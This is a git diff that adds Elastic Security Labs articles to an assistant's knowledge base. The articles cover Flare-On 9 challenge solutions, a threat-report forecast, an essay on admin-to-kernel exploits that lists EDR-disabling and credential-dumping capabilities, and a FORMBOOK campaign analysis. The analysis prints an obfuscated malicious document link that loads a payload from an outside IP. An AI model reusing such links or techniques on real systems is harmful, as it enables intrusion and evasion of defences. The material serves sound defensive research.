+When a DNS resolution returns 255.0.0.2, the backdoor expects two specific bytes of data (43d and 50d) which are used to calculate what superficially resembles a network address, 43.50.0.0. The command processing function then performs a comparison and appends a value between 0 and 22.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image59.jpg)
+
+The flared_56 function XORs a value in an array with 248 to determine if the result is equal to the value passed in the parameter or not. If so, it appends a small chunk of text to one of the object’s properties and that value is then removed from the array.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image7.jpg)
+
+This tells us which command to send and in which order to append all the text chunks. We also noticed that when the array value is empty the \_bool flag is set to false. That’s probably not an accident, so let’s inspect any functions using that flag.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image79.jpg)
+
+This function is triggered each time an element is deleted from the value array.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image48.jpg)
+
+We can expect something to happen once the right conditions are met, and endeavor to contrive them.
+
+First, we generated a list of all possible IP address values. Then we configured [FakeDns](https://github.com/Crypt0s/FakeDns) to resolve \*.flare-on.com to that value list.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image44.jpg)
+
+Next, we use FakeDns to respond to requests using a round-robin approach that resolves to each IP address in order, until finally we get the response we were waiting for.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image62.jpg)
+
+\*_Flag: \*\_W3_4re_Known_f0r_[b31ng_Dyn4m1c@flare-on.com](mailto:b31ng_Dyn4m1c@flare-on.com)
+
+## Challenge 9 - “encryptor”
+
+> You're really crushing it to get this far. This is probably the end for you. Better luck next year!
+
+### Solution
+
+For this challenge, we’re provided two files: a Windows PE executable and an encrypted file.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image66.jpg)
+
+Encryption is interesting, and when we opened it in HxD we immediately saw a bunch of garbage followed by hexified data.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image83.jpg)
+
+When the binary is executed, it helpfully indicates a path is expected as an argument.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image29.jpg)
+
+But nothing happens when a random file is chosen, so a less random file must be what we need.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image42.jpg)
+
+We begin by tracing the function in IDA and note that it’s looking for a specific extension, “.EncryptMe”.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image3.jpg)
+
+Let’s try again with a random file that uses that specific file extension.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image6.jpg)
+
+And we see a new file generated with a different extension (“.Encrypted”) and a larger file size.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image56.jpg)
+
+Looking more closely at the executable in IDA, we determine that the binary is using ChaCha20 with a random key encrypted using RSA-2048.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image5.jpg)
+
+_We need that key._
+
+On the most basic level, encryption is just a system of math made up of basic operations like addition and multiplication. RSA is considered a strong implementation because it uses big numbers, and most RSA libraries implement a big number library of some kind. But we don’t really want to reverse all that just for the key, especially when we can find all the related functions in the sample and apply our knowledge of RSA.
+
+We need to generate prime numbers for two variables, p and q.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image11.jpg)
+
+We need to generate the modulus value n, which is equal to p\*q. Using p and q as inputs, return n. So far, so good.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image57.jpg)
+
+And we’re going to need a value phi, which is equal to (p-1)\*(q-1).
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image67.jpg)
+
+We deduce that the 2 previous functions are the decrement function that produce p-1 and q-1.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image89.jpg)
+
+Finally, we have an operation that produces the secret key d using phi and the exponent e.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image86.jpg)
+
+Notice however that something fishy is already happening because the global variable containing the exponent e is reused and will contain the private key d. Now at least we can validate that the key is encrypted with the private key (d, n) instead of the public key (e, n).
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image15.jpg)
+
+We can use the public key to decrypt the ChaCha20 key, however we don’t know the modulus value or the encrypted key. Fortunately for us, they are both hexified and appended to the encrypted output file.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image26.jpg)
+
+The encrypted ChaCha20 key is actually contained in the last three rows of the init structure, along with the nonce.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image32.jpg)
+
+The key can be decrypted with a little python.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image51.jpg)
+
+And we’re one step closer.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image101.jpg)
+
+By tracing execution with x64dbg, we can force the decryption of the encrypted file by replacing the ChaCha20 parameters with the key and nonce we’ve just obtained. Another flag down, and one more to go!
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image28.jpg)
+
+\*_Flag: \*\_R$A_$16n1n6*15_0pp0$17e*[0f_3ncryp710n@flare-on.com](mailto:0f_3ncryp710n@flare-on.com)
+
+## Challenge 10 - The Karaoke Labyrinth
+
+Somehow every member of the team has a nearly encyclopedic knowledge of song lyrics, and intuited their way through this one. Surprisingly whimsical, no reversing necessary.
+
+## Challenge 11 - “The challenge that shall not be named”
+
+> Protection, Obfuscation, Restrictions... Oh my!! The good part about this one is that if you fail to solve it I don't need to ship you a prize.
+
+### Solution
+
+This was the eleventh and final challenge of FLARE-ON 9, and unexpectedly straightforward after some of the previous ones. This challenge consisted of a binary, running strings on it gave some hints about it.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image65.jpg)
+
+“PyInstaller bundles a Python application and all its dependencies into a single package” is a nice summary of what PyInstaller is used for. This binary is compiled from Python scripts and packaged as a single executable, which is less of a problem than it might seem. We encounter those often enough that we’ve found [tools](https://github.com/extremecoders-re/pyinstxtractor) to extract python compiled in this way, and we pulled out a few python files.
+
+One of the files, 11.py, threw errors when we attempted to step through it and complained that the library “‘crypt’ has no attribute ‘ARC4’”.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image24.jpg)
+
+That’s kind of interesting. Notably, we can modify the crypt.py script located in “PYTHON_FOLDER_PATH\lib\crypt.py”, adding the ARC4 function and the class it returns with our custom encrypt function.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image10.jpg)
+
+When we run 11.py again, this time it prints us a beautiful flag which wakes us from the dream (or nightmare) that is the FLARE-ON challenge.
+
+![](/assets/images/flare-on-9-solutions-burning-down-the-house/image58.jpg)
+
+\*_Flag: \*\_Pyth0n_Prot3ction_tuRn3d_Up_[t0_11@flare-on.com](mailto:t0_11@flare-on.com)
+
+## Conclusion
+
+For the 2022 FLARE-ON challenge, that’s a wrap! We learned a bunch of new things this year and we hope you enjoyed reading our solutions. We’re looking forward to reading yours and learning things we didn’t try.
+
+For those who have waited patiently for a link to scripts, [here you go](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt2d75d12507c1a14d/636e8b687c54010b136bf9ec/flare-on_9_scripts.zip).
+
+#### Acknowledgements
+
+We want to thank Elastic and Devon Kerr, who gave us the opportunity to spend a week focused on this event. Thanks also to the Mandiant team for the fun and thoughtful challenges: well done. To the researchers who participated, thank you for making it a phenomenal week of learning.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/forecast_and_recommendations_2022_elastic_global_threat_report.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/forecast_and_recommendations_2022_elastic_global_threat_report.md
new file mode 100644
index 0000000000000..d0294bf8cc682
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/forecast_and_recommendations_2022_elastic_global_threat_report.md
@@ -0,0 +1,47 @@
+---
+title: "Forecast and Recommendations: 2022 Elastic Global Threat Report"
+slug: "forecast-and-recommendations-2022-elastic-global-threat-report"
+date: "2022-11-30"
+description: "With the release of our first Global Threat Report at Elastic, customers, partners, and the security community at large are able to identify many of the focus areas our team has had over the past 12 months."
+author:
+  - slug: santosh-krishnan
+image: "gtr-blog-image-720x420.jpg"
+category:
+  - slug: reports
+---
+
+Today, we released our first-ever [Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report) at Elastic. Now, customers, partners, and the security community at large will be able to identify many of the focus areas our team has had over the past 12 months. In addition to a technical perspective, this report also brings along a series of strategic recommendations for executives and security leaders alike: a summarized, accurate perspective of where we can expect to see adversaries move over the coming months.
+
+Our hope is that threat researchers and the security industry as a whole will use this report to prepare for the next set of threats and campaigns. At Elastic, we are ensuring that our customers using the Elastic Security solution are best protected from these types of threats, including endpoint and cloud capabilities for automated protection.
+
+This year, our report included six key forecasts and recommendations for strategists and practitioners to stay better informed of potential directions that threat actors may focus on in 2023 and beyond. Below, we summarize the first three of our forecasts. Further details on these and our other recommendations are available in our full, [downloadable report](https://www.elastic.co/explore/security-without-limits/global-threat-report) for 2022:
+
+> Adversaries will continue to abuse built-in binary proxies to evade security instrumentation.&nbsp;
+>
+> The use of proven adversarial tactics remains a key area of focus for observed threat groups, and this year remains no different. Hostile groups leverage legitimate, native system binaries to load malicious software — evading many detection strategies used by modern enterprises.
+>
+> With this continued focus, Elastic Security has enhanced our deep visibility and pre-built protections, including numerous rules and signatures, alongside ML models to detect these threats faster and more effectively.
+
+![](/assets/images/forecast-and-recommendations-2022-elastic-global-threat-report/blog-elastic-threat2022-1.jpg)
+
+> LNK and ISO payloads will replace more conventional script and document payloads.
+>
+> Adversarial behavior focuses on finding easier, more efficient pathways for attack — and this year, it is no different. System defaults have forced threat groups to pivot their strategies to leverage LNK and ISO payloads over familiar scripts and documents we have observed in the past.
+>
+> LNK and ISO files are often used to smuggle malicious software into enterprises because most security technologies don't inspect them. Elastic Security has focused on building instrumentation into our products and platform, allowing us to determine the exact mechanisms used to better build a defense against these malicious acts.
+
+![](/assets/images/forecast-and-recommendations-2022-elastic-global-threat-report/blog-elastic-threat2022-2.jpg)
+
+> Valid IAM accounts will continue to be a target for adversaries.
+>
+> The early stages of many attacks focus on credential theft in all forms; however, IAM and administrative credentials often remain the area of focus for many adversarial groups looking to evade detection and avoid exploitation of services.&nbsp;
+>
+> Understanding standard account actions and user behaviors exhibited in environments is critical to defending them, and ensuring we have a comprehensive library of detections alongside integration capabilities within the stack has provided a strong foundation in detecting threats earlier.
+
+![](/assets/images/forecast-and-recommendations-2022-elastic-global-threat-report/blog-elastic-threat2022-3.jpg)
+
+This is just a small introduction to the findings found in the report. Far greater detail, recommendations, and source data are available in the [2022 Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report).
+
+Those looking to learn more about the threats we observed and the mechanisms adversarial groups leveraged over the last year can read far more detailed information in our full report — alongside many recommendations and findings we have leveraged to help shape the strategy used within the Elastic Security solution, and future feature roadmap.
+
+Feel free to check out the full [2022 Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report) here.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/forget_vulnerable_drivers_admin_is_all_you_need.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/forget_vulnerable_drivers_admin_is_all_you_need.md
new file mode 100644
index 0000000000000..402a764d3c8c7
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/forget_vulnerable_drivers_admin_is_all_you_need.md
@@ -0,0 +1,75 @@
+---
+title: "Forget vulnerable drivers - Admin is all you need"
+slug: "forget-vulnerable-drivers-admin-is-all-you-need"
+date: "2023-08-25"
+description: "Bring Your Own Vulnerable Driver (BYOVD) is an increasingly popular attacker technique whereby a threat actor brings a known-vulnerable signed driver alongside their malware, loads it into the kernel, then exploits it to perform some action within the kernel that they would not otherwise be able to do. Employed by advanced threat actors for over a decade, BYOVD is becoming increasingly common in ransomware and commodity malware."
+author:
+  - slug: gabriel-landau
+image: "photo-edited-09@2x.jpg"
+category:
+  - slug: perspectives
+---
+
+## Introduction
+Bring Your Own Vulnerable Driver (BYOVD) is an increasingly popular attacker technique wherein a threat actor brings a known-vulnerable signed driver alongside their malware, loads it into the kernel, then exploits it to perform some action within the kernel that they would not otherwise be able to do. After achieving kernel access, they may tamper with or disable security software, dump otherwise inaccessible credentials, or modify operating system behavior to hide their presence. [Joe Desimone](https://twitter.com/dez_) and I covered this in-depth, among other [kernel mode threats](https://i.blackhat.com/us-18/Thu-August-9/us-18-Desimone-Kernel-Mode-Threats-and-Practical-Defenses.pdf), at Black Hat USA 2018. Employed by advanced threat actors for over a decade, BYOVD is becoming increasingly common in ransomware and commodity malware.
+
+[Driver Signing Enforcement](https://learn.microsoft.com/en-us/windows-hardware/drivers/install/kernel-mode-code-signing-policy--windows-vista-and-later-) (DSE), first deployed in 2007 by Windows Vista x64, was the first time that Microsoft attempted to limit the power of admins. With DSE in place, admins could no longer instantly load any code into the kernel. Admin restrictions grew over time with the rollout of [Boot Guard](https://www.intel.com/content/dam/www/central-libraries/us/en/documents/below-the-os-security-white-paper.pdf), [Secure Boot](https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-secure-boot), and [Trusted Boot](https://learn.microsoft.com/en-us/windows/security/operating-system-security/system-security/trusted-boot) to protect the boot chain from admin malware, which could previously install their own boot loaders / bootkits.
+
+Further limiting admins' power, Microsoft recently deployed the [Vulnerable Driver Blocklist](https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules#microsoft-vulnerable-driver-blocklist) by default, starting in Windows 11 22H2. This is a move in the right direction, making Windows 11 more secure by default. Unfortunately, the blocklist's deployment model can be slow to adapt to new threats, with updates automatically deployed typically only once or twice a year. Users can manually update their blocklists, but such interventions bring us out of “secure by default” territory.
+
+## Security boundaries
+When determining which vulnerabilities to fix, the Microsoft Security Response Center ([MSRC](https://msrc.microsoft.com/)) uses the concept of a security boundary, which it [defines](https://web.archive.org/web/20230506125554/https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria) as follows:
+
+> A security boundary provides a logical separation between the code and data of security domains with different levels of trust. For example, the separation between kernel mode and user mode is a classic and straightforward security boundary.
+
+Based on this definition, one might be inclined to think that malware running in user mode should not be able to modify kernel memory. The boundary is “straightforward” after all. Logically, any violation of that boundary should be met with a remedial action such as a patch or blocklist update.
+
+Unfortunately, the situation gets murkier from here. That document later states that administrator-to-kernel is not a security boundary, with the following explanation:
+
+> Administrative processes and users are considered part of the Trusted Computing Base (TCB) for Windows and are therefore not strong [sic] isolated from the kernel boundary. 
+
+At this point, we have two seemingly conflicting viewpoints. On one hand, MSRC states that admin-to-kernel is an indefensible boundary and not worth fixing. On the other hand, Microsoft is attempting to defend this boundary with mechanisms such as Driver Signing Enforcement, Secure Boot, and the Vulnerable Driver Blocklist. Because the defense is incomplete, MSRC instead calls them “defense-in-depth security features.”
+
+MSRC similarly does not consider admin-to-[PPL](https://www.elastic.co/blog/protecting-windows-protected-processes) a security boundary, instead classifying it as a defense-in-depth security feature. More on this in the next section.
+
+The rest of this article will refer to MSRC and Microsoft separately. While MSRC is part of Microsoft, Microsoft is a much larger entity than MSRC; they shouldn't be equated.
+
+## Exploiting vulnerabilities
+In September 2022, I filed VULN-074311 with MSRC, notifying them of two [zero-day](https://www.trendmicro.com/vinfo/us/security/definition/zero-day-vulnerability) vulnerabilities in Windows: one admin-to-PPL and one PPL-to-kernel. I provided source code for both exploits. The response concisely indicated that they understood the vulnerabilities and declined to take any further action, as stated below:
+
+> The research describes a multi-step attack that leverages a PPL bypass to gain kernel code execution. Note that all of the proposed attacks do require administrative privileges to perform and thus the reported issue does not meet our bar for immediate servicing. We do not expect any further action and will proceed with closing out the case.
+
+In this parlance, “servicing” means “patching.” Their response is consistent with the aforementioned policy and their [historical treatment](https://github.com/ionescu007/r0ak/tree/919338f4e88036c6a46a3a839f409efe38852415#faq) of the admin-to-kernel boundary. Their behavior is consistent too - it's been over 11 months and they still haven't patched either vulnerability. I find it fascinating that Microsoft is willing to block drivers that can modify kernel memory but MSRC is unwilling to service vulnerabilities that can do the same.
+
+When I announced my Black Hat Asia 2023 talk, [PPLdump Is Dead. Long Live PPLdump](https://www.blackhat.com/asia-23/briefings/schedule/#ppldump-is-dead-long-live-ppldump-31052), on Twitter five months after the MSRC report, the Windows Defender team quickly reached out to learn more. It seems that MSRC closed the case without telling the Defender team, whose products rely on PPL to protect [hundreds of millions of Windows machines](https://www.ghacks.net/2019/08/03/windows-defender-has-a-market-share-of-50/), about a PPL bypass. This type of miscommunication mustn't be allowed to continue.
+
+## Turnkey tooling
+[EDRSandBlast](https://github.com/wavestone-cdt/EDRSandblast) is a tool that weaponizes vulnerable drivers to bypass AV & EDR software. It can modify kernel memory to remove hooks installed by AV & EDR, temporarily or permanently blinding them to malicious activity on the system.
+
+As I discussed in my Black Hat Asia talk, MSRC has de-facto shown that they are unwilling to service admin-to-PPL and admin-to-kernel vulnerabilities and that it requires the existence of [turnkey tooling](https://twitter.com/tiraniddo/status/1551966781761146880?s=20) on GitHub to motivate Microsoft to action. This led me to release the admin-to-PPL exploit [PPLFault](https://github.com/gabriellandau/PPLFault) and admin-to-kernel exploit chain [GodFault](https://github.com/gabriellandau/PPLFault#godfault) as easy-to-use tools on GitHub. For brevity, below we'll call them “PPL vulnerability” and “kernel vulnerability”, respectively.
+
+In this same “turnkey tooling” spirit, to highlight the inconsistency of blocking known-vulnerable drivers while simultaneously refusing to patch admin-to-kernel exploit chains, I am [releasing](https://github.com/gabriellandau/EDRSandblast-GodFault) a version of EDRSandBlast that integrates PPLFault to demonstrate the same result, sans vulnerable drivers. You can see it [here](https://gist.github.com/gabriellandau/418cde5d194a5e7adff641f2164cd1d7#file-edrsandblast-godfault-txt-L21-L27) disabling the Windows Defender driver. My goal in releasing this is to motivate MSRC to treat both PPL and kernel vulnerabilities with greater urgency.
+
+## Mitigation
+I released a small kernel driver alongside PPLFault and GodFault called [NoFault](https://github.com/gabriellandau/PPLFault/tree/7d5543eb6f9e4fd8d8380cbf358dab2f159703af/NoFault) which breaks the PPL exploit. Until Windows is fixed, anti-malware vendors can employ this code to mitigate the PPL vulnerability. We've incorporated NoFault's protection into the latest version of Elastic Endpoint/Defend - please update to 8.9.0+ if you haven't already. One comprehensive fix could be to have the memory manager enforce page hashes for all executable images loaded into PPL, a feature [already employed](https://twitter.com/DavidLinsley11/status/1190810926762450944?s=20) for full Protected Processes.
+
+GodFault is not the first tool to exploit the kernel vulnerability. [ANGRYORCHARD](https://github.com/realoriginal/angryorchard) first used it with the now-patched [KnownDLLs PPL vulnerability](https://googleprojectzero.blogspot.com/2018/08/windows-exploitation-tricks-exploiting.html). The PPL vulnerability has since been fixed, but the kernel one was not.  I was able to easily reuse the kernel vulnerability in GodFault - it's only a [few lines of code](https://github.com/gabriellandau/PPLFault/blob/da270ab29d4f02e8bd2dd525f1c85979ded3df58/GMShellcode/GMShellcode.c#L177-L192). If this is not patched, then any future PPL exploits will immediately be chainable to the kernel. Note that NoFault breaks the kernel exploit chain by preventing its requisite PPL code execution, but does not fix the kernel vulnerability itself.
+
+## Discussion
+Making EDRSandBlast driverless is just one example of the things you can do with such exploits. Admin-to-kernel exploits enable a whole menu of malware capabilities that are normally impossible from user mode, including:
+
+ - Disable kernel mode telemetry including process, thread, object manager, filesystem, and registry callbacks. EDRSandBlast does some of these.
+ - Disable kernel ETW loggers
+ - Terminate and/or inject malware into [PPL anti-malware processes](https://learn.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-)
+ - Bypass LSA RunAsPPL to dump credentials or tamper with Credential Guard
+ - Read/write the memory of shielded VM worker processes, which [run as PPL](https://learn.microsoft.com/en-us/windows-server/security/guarded-fabric-shielded-vm/guarded-fabric-and-shielded-vms#what-are-the-types-of-virtual-machines-that-a-guarded-fabric-can-run)
+ - Run malware with greater privilege than anti-malware, such that it can't be scanned or terminated from user mode
+ - Implement rootkit behavior such as hiding processes, files, and registry keys
+ - Gain full read-write access to physical memory
+
+Such kernel-driven capabilities, often enabled by BYOVD, are [regularly](https://www.bleepingcomputer.com/news/security/blackbyte-ransomware-abuses-legit-driver-to-disable-security-products/) [used](https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html) [by](https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/) [criminals](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf) [to](https://www.bleepingcomputer.com/news/security/ransomware-gangs-abuse-process-explorer-driver-to-kill-security-software/) [defeat](https://thehackernews.com/2023/04/ransomware-hackers-using-aukill-tool-to.html) [and](https://cybernews.com/security/bring-your-own-vulnerable-driver-attack/) [degrade](https://www.techspot.com/news/95781-hackers-use-genshin-impact-anti-cheat-software-ransomware.html) [security](https://arstechnica.com/information-technology/2020/02/hackable-code-trusted-by-windows-lets-ransomware-burrow-deep-into-targeted-machines/) [products](https://www.sentinelone.com/labs/malvirt-net-virtualization-thrives-in-malvertising-attacks/), empowering them to hurt people and businesses. PPL and kernel vulnerabilities enable these same capabilities, so MSRC needs to service them proactively before threat actors abuse them, not after.
+
+I don't want to understate the difficulty of the problem - defending the kernel against admins is hard and will require continual effort as new bypasses are found. It will not be solved, but rather a difficult and ongoing arms race. Fortunately, Microsoft recently adopted a new philosophy of “[no longer avoiding the hard things](https://youtu.be/8T6ClX-y2AE?t=244)” (timestamped link). Addressing these types of vulnerabilities is a “hard thing” affecting Windows security today that Microsoft can do something about while simultaneously moving towards their vision of an [Adminless future](https://www.bigtechwire.com/2023/04/20/microsoft-admin-less-support-is-coming-in-a-future-windows-release/). They're a large well-funded company filled with smart people, capable of addressing multiple issues at once.
+
+## Conclusion
+Microsoft created the Vulnerable Driver Blocklist to stop admins from tampering with the kernel, but they've done nothing about an admin-to-kernel exploit chain that was reported over 11 months ago. By [removing the vulnerable driver requirement from EDRSandBlast](https://github.com/gabriellandau/EDRSandblast-GodFault) via [GodFault](https://github.com/gabriellandau/PPLFault#godfault), I hope to prove that admin-to-kernel exploits can be just as dangerous as vulnerable drivers and that MSRC needs to take them seriously. Given Windows 11's [goal of default security](https://www.youtube.com/watch?v=8T6ClX-y2AE) and the fact that the Vulnerable Driver Blocklist is now enabled by default, MSRC needs to reconsider its policy of indifference towards PPL and kernel exploits.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/formbook_adopts_cab_less_approach.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/formbook_adopts_cab_less_approach.md
new file mode 100644
index 0000000000000..c95fa5a55a5c2
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/formbook_adopts_cab_less_approach.md
@@ -0,0 +1,531 @@
+---
+title: "FORMBOOK Adopts CAB-less Approach"
+slug: "formbook-adopts-cab-less-approach"
+date: "2022-06-07"
+description: "Campaign research and analysis of an observed FORMBOOK intrusion attempt."
+author:
+  - slug: derek-ditch
+  - slug: daniel-stepanic
+  - slug: seth-goodwin
+  - slug: andrew-pease
+image: "blog-security-laptop-720x420.png"
+category:
+  - slug: campaigns
+tags:
+  - formbook
+  - malware
+  - phishing
+  - cve-2021-40444
+---
+
+The Elastic Intelligence & Analytics team is tracking a new FORMBOOK information-stealing campaign leveraging the MSHTML remote code exploit ([CVE-2021-40444](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444)). This campaign has been observed sharing infrastructure between the [Weaponization](https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html) phases of both the testing and production releases.
+
+We have observed, and will discuss, three phases of this campaign relevant to defenders:
+
+- Testing phase using CVE-2021-40444
+- Production phase using CVE-2021-40444
+- Generic phase without CVE-2021-40444
+
+As of November 8, 2021, Elastic observed network infrastructure actively being used to deploy the FORMBOOK information stealer and acting as a command and control endpoint serving archives, implants, and scripts leveraged throughout the campaign variations.
+
+> We wanted to call out some great adjacent research from the team as Sophoslabs Uncut that was released on December 21, 2021. Research groups frequently analyze similar, or in this case, the same campaigns through their lens. This is fantastic as it gets more eyes, from different perspectives, onto the same problem. If you're looking for more information, please check out their research over on their [blog](https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/).
+
+## Key Takeaways
+
+- The speed at which vulnerability PoC’s are being released highlights the need to leverage threat hunting to identify post-exploitation events before patches can be applied
+
+- A FORMBOOK campaign was observed combining infrastructure that allowed testing and production phases to be linked together
+- Patching for the MSHTML exploit appears to be effective as the campaign shifted from attempting to use the exploit to a traditional phishing malware-attachment approach
+- The campaign required a multi-process attack chain to load a DLL file onto victim systems
+
+On September 7, 2021, Microsoft confirmed a [vulnerability](https://nvd.nist.gov/vuln/detail/CVE-2021-40444) for the browser rendering engine used in several applications such as those within the Microsoft Office suite. Within three days [[1](https://twitter.com/vxunderground/status/1436326057179860992?s=20)] [[2](https://github.com/lockedbyte/CVE-2021-40444)], proof-of-concept code was released, highlighting the maturity of the exploit development ecosystem and underscoring the importance of proactive threat hunting and patch management strategies.
+
+Based on telemetry, we observed this exploit used in conjunction with the FORMBOOK information stealer. We also identified an adversary tradecraft oversight that led to us connecting what appeared to be campaign testing infrastructure and a FORMBOOK phishing campaign targeting manufacturing victims with global footprints.
+
+This post details the tactics, techniques, and procedures (TTPs) of this campaign. Our goal is to enable detection capabilities for security practitioners using the Elastic Stack and any readers concerned with the CVE-2021-40444 vulnerability or campaigns related to FORMBOOK.
+
+## Details
+
+When Microsoft disclosed a [vulnerability](https://nvd.nist.gov/vuln/detail/CVE-2021-40444) in the browser rendering engine used by multiple Microsoft Office products, proof-of-concept code was released within three days. This allowed defenders to observe how the exploit operated and to develop countermeasures to defend their networks while patches and mitigating workarounds could be deployed [[1](https://github.com/aslitsecurity/CVE-2021-40444_builders)], [[2](https://github.com/lockedbyte/CVE-2021-40444)], [[3](https://github.com/klezVirus/CVE-2021-40444)], [[4](https://kentosec.com/2021/09/12/cve-2021-40444-poc-demonstration/)], [[5](https://github.com/Edubr2020/CVE-2021-40444--CABless)], [[6](https://twitter.com/vxunderground/status/1436326057179860992?s=20)].
+
+Additionally, this highlights the maturity of the exploit development community — underscoring the importance of proactive measures (like network and endpoint monitoring, anti-spam/phishing countermeasures, email MIME-type attachment policies, etc.) and an exercised patch management strategy.
+
+At a high level, an attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that will allow for code to be remotely executed on a victim machine. While this vulnerability is well documented, security researcher
+
+We initiated several collection techniques simultaneously, including searching for malicious attachments that would be included in phishing emails — one of the most common mechanisms for distributing exploit code. We noticed that not many malicious email attachments had been reported, and by October 28, 2021, we were only able to identify four instances of this exploit leveraged with email. In addition to the four instances of the exploit, we observed the threat actor attempting to leverage a generic phishing approach with the FORMBOOK malware as an attachment.
+
+The next following sections will break down these different campaign sightings and their respective details:
+
+- Testing
+- Production
+- Generic
+
+> Throughout the Details section, it is important to note a few things that are required for this attack chain to function, irrespective of the Testing or Production phases
+>
+> 1. A major challenge for the campaign is to get a DLL file onto the victim system
+> 2. ActiveX controls are DLL files with special constraints
+> 3. Web pages can link ActiveX controls directly or load files that are contained in a URL --- this is not recommended by Microsoft because file signatures cannot be validated
+
+### Testing phase
+
+The first sighting contained an email with a single attachment with a sender of admin0011[@]issratech.com. While researching that email address, we discovered this email address associated with additional malicious samples in VirusTotal. The email observed in this phase included a single attachment called Request Details.docx.
+
+![Testing phase lure email](/assets/images/formbook-adopts-cab-less-approach/testing-phase-lure-email.jpg)
+
+Email attachments are stored as Base64 encoded strings in the email. To extract the Request Details.docx email attachment, we can use the echo command to send the Base64 encoded string to STDOUT, pipe it to the base64 program, and save it as email-attachment so that we can analyze it.
+
+```
+$ echo "UEsDBBQAAAAIAFCELVO0gTweZgEAAIgFAAATAAAAW0NvbnRlbnRfVHlwZXNdLnhtbLVUyWrDMBC9F/oPRtdgK+...truncated..." | base64 -D -o email-attachment
+```
+
+#### Request Details.docx
+
+The file command is a standard Unix and Unix-like program for identifying a file type. Running the file command, verified that this was a Microsoft Word document:
+
+```
+$ file email-attachment
+email-attachment: Microsoft Word 2007+
+```
+
+Microsoft Office documents, post-2007, are compressed archives. To dig into the document without opening it, you can decompress the file using the unzip command as illustrated below.
+
+```
+$ unzip email-attachment
+Archive:  email-attachment
+    inflating: [Content_Types].xml
+    inflating: docProps/app.xml
+    inflating: docProps/core.xml
+    inflating: word/document.xml
+    inflating: word/fontTable.xml
+    inflating: word/settings.xml
+    inflating: word/styles.xml
+    inflating: word/webSettings.xml
+    inflating: word/media/image1.jpeg
+    inflating: word/media/image2.wmf
+    inflating: word/theme/theme1.xml
+    inflating: word/_rels/document.xml.rels
+    inflating: _rels/.rels
+```
+
+Within the document relationship file (word/\_rels/document.xml.rels), we can view metadata about how different elements of the document are related to each other.
+
+```
+$ cat word/_rels/document.xml.rels
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+...truncated...
+<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
+Target="MHTML:&#x48;&#x54;&#x54;&#x50;&#x3a;&#x5c;&#x5c;&#x31;&#x30;&#x34;&#x2e;&#x32;&#x34;&#x34;&#x2e;&#x37;&#x38;&#x2e;
+    &#x31;&#x37;&#x37;&#x5c;&#x50;&#x6f;&#x70;&#x65;&#x2e;&#x74;&#x78;&#x74;&#x21" TargetMode="External"/>
+...truncated
+</Relationships>
+```
+
+From here, we can see an externally linked MHTML OLE object inside an element using [HTML entities](https://www.w3schools.com/html/html_entities.asp), which reserve characters in HTML. HTML entities are natively not human readable, so they need to be decoded. Using the data analyzer and decoder from the United Kingdom’s Government Communications Headquarters (GCHQ), [CyberChef](https://gchq.github.io/CyberChef/), we were able to quickly decode the HTML entities with the “From HTML Entity” recipe (CyberChef recipes are pre-configured data parsers and decoders).
+
